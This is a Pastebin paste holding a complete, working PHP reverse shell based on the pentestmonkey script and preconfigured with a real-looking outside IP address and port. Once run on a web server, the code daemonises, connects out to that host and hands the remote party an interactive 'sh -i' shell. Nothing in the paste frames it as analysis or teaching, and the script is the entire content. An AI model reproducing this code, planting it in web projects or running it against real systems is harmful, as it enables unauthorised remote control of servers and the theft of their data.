API tools faq
paste
premankeyboard

xxx

premankeyboard
Dec 19th, 2025
831
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. // php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
  3. // Copyright (C) 2007 [email protected]
  4.  
  5. set_time_limit (0);
  6. $VERSION = "1.0";
  7. $ip = '185.82.73.85';
  8. $port = 13123;
  9. $chunk_size = 1400;
  10. $write_a = null;
  11. $error_a = null;
  12. $shell = 'uname -a; w; id; sh -i';
  13. $daemon = 0;
  14. $debug = 0;
  15.  
  16. if (function_exists('pcntl_fork')) {
  17. $pid = pcntl_fork();
  18.  
  19. if ($pid == -1) {
  20. printit("ERROR: Can't fork");
  21. exit(1);
  22. }
  23.  
  24. if ($pid) {
  25. exit(0); // Parent exits
  26. }
  27. if (posix_setsid() == -1) {
  28. printit("Error: Can't setsid()");
  29. exit(1);
  30. }
  31.  
  32. $daemon = 1;
  33. } else {
  34. printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
  35. }
  36.  
  37. chdir("/");
  38.  
  39. umask(0);
  40.  
  41. // Open reverse connection
  42. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  43. if (!$sock) {
  44. printit("$errstr ($errno)");
  45. exit(1);
  46. }
  47.  
  48. $descriptorspec = array(
  49. 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
  50. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
  51. 2 => array("pipe", "w") // stderr is a pipe that the child will write to
  52. );
  53.  
  54. $process = proc_open($shell, $descriptorspec, $pipes);
  55.  
  56. if (!is_resource($process)) {
  57. printit("ERROR: Can't spawn shell");
  58. exit(1);
  59. }
  60.  
  61. stream_set_blocking($pipes[0], 0);
  62. stream_set_blocking($pipes[1], 0);
  63. stream_set_blocking($pipes[2], 0);
  64. stream_set_blocking($sock, 0);
  65.  
  66. printit("Successfully opened reverse shell to $ip:$port");
  67.  
  68. while (1) {
  69. if (feof($sock)) {
  70. printit("ERROR: Shell connection terminated");
  71. break;
  72. }
  73.  
  74. if (feof($pipes[1])) {
  75. printit("ERROR: Shell process terminated");
  76. break;
  77. }
  78.  
  79. $read_a = array($sock, $pipes[1], $pipes[2]);
  80. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  81.  
  82. if (in_array($sock, $read_a)) {
  83. if ($debug) printit("SOCK READ");
  84. $input = fread($sock, $chunk_size);
  85. if ($debug) printit("SOCK: $input");
  86. fwrite($pipes[0], $input);
  87. }
  88.  
  89. if (in_array($pipes[1], $read_a)) {
  90. if ($debug) printit("STDOUT READ");
  91. $input = fread($pipes[1], $chunk_size);
  92. if ($debug) printit("STDOUT: $input");
  93. fwrite($sock, $input);
  94. }
  95.  
  96. if (in_array($pipes[2], $read_a)) {
  97. if ($debug) printit("STDERR READ");
  98. $input = fread($pipes[2], $chunk_size);
  99. if ($debug) printit("STDERR: $input");
  100. fwrite($sock, $input);
  101. }
  102. }
  103.  
  104. fclose($sock);
  105. fclose($pipes[0]);
  106. fclose($pipes[1]);
  107. fclose($pipes[2]);
  108. proc_close($process);
  109.  
  110. function printit ($string) {
  111. if (!$daemon) {
  112. print "$string\n";
  113. }
  114. }
  115.  
  116. ?>
Advertisement
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!